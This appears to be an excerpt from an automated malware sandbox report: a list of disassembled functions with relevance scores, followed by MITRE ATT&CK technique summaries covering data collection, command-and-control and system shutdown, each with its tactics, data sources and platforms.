Function 00C1708B Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Function 00C13766 Relevance: 16.0, APIs: 1, Strings: 8, Instructions: 267
COMMON

Function 00C13633 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151
windowtimeregistryCOMMON

Function 00C139D5 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 44
COMMON

Function 010275C0 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Function 01027390 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 143
fileCOMMON

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre